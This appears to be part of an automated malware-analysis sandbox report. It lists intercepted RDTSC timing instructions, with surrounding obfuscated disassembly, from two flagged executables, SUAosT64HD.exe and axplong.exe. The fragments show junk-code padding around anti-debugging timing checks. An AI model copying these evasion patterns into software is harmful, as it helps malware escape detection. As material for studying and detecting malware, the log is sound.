Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 5500516 second address: 5500529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e mov esi, 23982EBDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D04A8 second address: 54D04E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FC3507E537Ch 0x00000013 jmp 00007FC3507E5385h 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D04E3 second address: 54D0501 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 mov ch, 4Eh 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC350C3E71Bh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D0501 second address: 54D0505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D0505 second address: 54D050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D050B second address: 54D055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007FC3507E5384h 0x0000000b sbb ax, 7C08h 0x00000010 jmp 00007FC3507E537Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC3507E5386h 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D055A second address: 54D055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D055E second address: 54D057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0305 second address: 54B0309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0309 second address: 54B030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B030F second address: 54B0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0315 second address: 54B0319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0319 second address: 54B03B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC350C3E722h 0x00000010 xor esi, 357ABB08h 0x00000016 jmp 00007FC350C3E71Bh 0x0000001b popfd 0x0000001c jmp 00007FC350C3E728h 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, di 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC350C3E720h 0x00000032 adc ah, FFFFFFC8h 0x00000035 jmp 00007FC350C3E71Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FC350C3E728h 0x00000041 adc si, B228h 0x00000046 jmp 00007FC350C3E71Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B03B6 second address: 54B03F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1992C8CAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FC3507E5387h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC3507E5385h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0EBD second address: 54C0ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0ECD second address: 54C0F07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FC3507E5386h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3507E537Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0F07 second address: 54C0F16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0F16 second address: 54C0F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5384h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D02C7 second address: 54D02CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54F0720 second address: 54F0726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0725 second address: 54C072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C072B second address: 54C072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C072F second address: 54C07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [7732B370h] 0x0000000d pushad 0x0000000e call 00007FC350C3E726h 0x00000013 pushfd 0x00000014 jmp 00007FC350C3E722h 0x00000019 and ecx, 47072558h 0x0000001f jmp 00007FC350C3E71Bh 0x00000024 popfd 0x00000025 pop eax 0x00000026 push edi 0x00000027 mov si, 182Bh 0x0000002b pop eax 0x0000002c popad 0x0000002d xor dword ptr [ebp-08h], eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC350C3E71Dh 0x00000037 and si, 58F6h 0x0000003c jmp 00007FC350C3E721h 0x00000041 popfd 0x00000042 movzx eax, di 0x00000045 popad 0x00000046 xor eax, ebp 0x00000048 jmp 00007FC350C3E728h 0x0000004d nop 0x0000004e pushad 0x0000004f pushad 0x00000050 call 00007FC350C3E71Ch 0x00000055 pop eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C07D9 second address: 54C0838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC3507E5381h 0x0000000b and ecx, 233FAE66h 0x00000011 jmp 00007FC3507E5381h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FC3507E5381h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC3507E5388h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0838 second address: 54C083E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C083E second address: 54C086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC3507E5387h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C086C second address: 54C08BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 and ax, 510Eh 0x0000000e jmp 00007FC350C3E729h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr fs:[00000000h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f mov dx, 8D9Ch 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 mov di, DD46h 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C08BE second address: 54C08C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C08C2 second address: 54C08C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C08C6 second address: 54C08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C08CC second address: 54C08DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C08DC second address: 54C0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC3507E5380h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0904 second address: 54C0908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0908 second address: 54C090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C090E second address: 54C09A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov ebx, 4C08AD90h 0x00000011 popad 0x00000012 jne 00007FC3C29ADB11h 0x00000018 pushad 0x00000019 pushad 0x0000001a push edi 0x0000001b pop esi 0x0000001c pushfd 0x0000001d jmp 00007FC350C3E727h 0x00000022 adc al, FFFFFFEEh 0x00000025 jmp 00007FC350C3E729h 0x0000002a popfd 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007FC350C3E720h 0x00000032 xor ax, 3368h 0x00000037 jmp 00007FC350C3E71Bh 0x0000003c popfd 0x0000003d popad 0x0000003e sub eax, eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FC350C3E722h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C09A2 second address: 54C09F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC3507E5381h 0x00000009 sbb ecx, 00B61C36h 0x0000000f jmp 00007FC3507E5381h 0x00000014 popfd 0x00000015 call 00007FC3507E5380h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [ebp-20h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC3507E537Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C09F4 second address: 54C09FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C09FA second address: 54C09FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C09FE second address: 54C0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [esi] 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e pushad 0x0000000f movsx edi, ax 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 popad 0x00000017 mov dword ptr [ebp-24h], ebx 0x0000001a pushad 0x0000001b mov dx, 01A6h 0x0000001f call 00007FC350C3E727h 0x00000024 mov ah, 5Bh 0x00000026 pop ebx 0x00000027 popad 0x00000028 test ebx, ebx 0x0000002a pushad 0x0000002b mov edx, esi 0x0000002d mov esi, 083ACC19h 0x00000032 popad 0x00000033 je 00007FC3C29AD950h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC350C3E71Bh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0A56 second address: 54C0ACC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC3507E5383h 0x00000015 jmp 00007FC3507E5383h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FC3507E5388h 0x00000021 sub si, D998h 0x00000026 jmp 00007FC3507E537Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54C0ACC second address: 54C0AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0D86 second address: 54B0D95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0D95 second address: 54B0DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC350C3E722h 0x00000009 sub ecx, 312797B8h 0x0000000f jmp 00007FC350C3E71Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov dx, ax 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 6EF293 second address: 6EF299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 6EF299 second address: 6EF29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 867689 second address: 86769D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E5380h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 867960 second address: 867966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 867966 second address: 867974 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FC3507E5376h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 867AB8 second address: 867AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 86AE02 second address: 86AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 86AF67 second address: 86AF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC350C3E71Bh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 86B0B0 second address: 86B0B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 86B14D second address: 86B157 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 86B157 second address: 86B15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 853688 second address: 85368C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 85368C second address: 85369D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888751 second address: 88875D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC350C3E716h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888890 second address: 888896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888896 second address: 8888A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FC350C3E716h 0x0000000d jnc 00007FC350C3E716h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8889FE second address: 888A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3507E537Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888A0F second address: 888A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888A13 second address: 888A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888CE4 second address: 888CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888DFA second address: 888E06 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3507E5376h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888E06 second address: 888E4A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e pop esi 0x0000000f jc 00007FC350C3E71Ch 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007FC350C3E729h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888E4A second address: 888EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5389h 0x00000007 jmp 00007FC3507E5384h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC3507E537Ah 0x00000014 jmp 00007FC3507E537Fh 0x00000019 popad 0x0000001a jns 00007FC3507E537Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888EA8 second address: 888EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 888EAE second address: 888EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8891B1 second address: 8891C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 889362 second address: 889392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 jo 00007FC3507E5376h 0x0000000e jnl 00007FC3507E5376h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FC3507E5376h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 889392 second address: 889396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88A460 second address: 88A466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88A466 second address: 88A46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88DB4C second address: 88DB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88DB50 second address: 88DB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 88E282 second address: 88E294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jp 00007FC3507E5376h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89539A second address: 89539E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 894B21 second address: 894B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC3507E5381h 0x0000000f popad 0x00000010 push ecx 0x00000011 jo 00007FC3507E5376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 894B46 second address: 894B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 894F90 second address: 894FB5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3507E5376h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC3507E5378h 0x00000012 popad 0x00000013 js 00007FC3507E538Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FC3507E5376h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
